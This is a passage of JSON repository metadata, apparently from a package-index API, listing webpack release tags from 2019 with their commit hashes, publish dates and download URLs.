ha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at"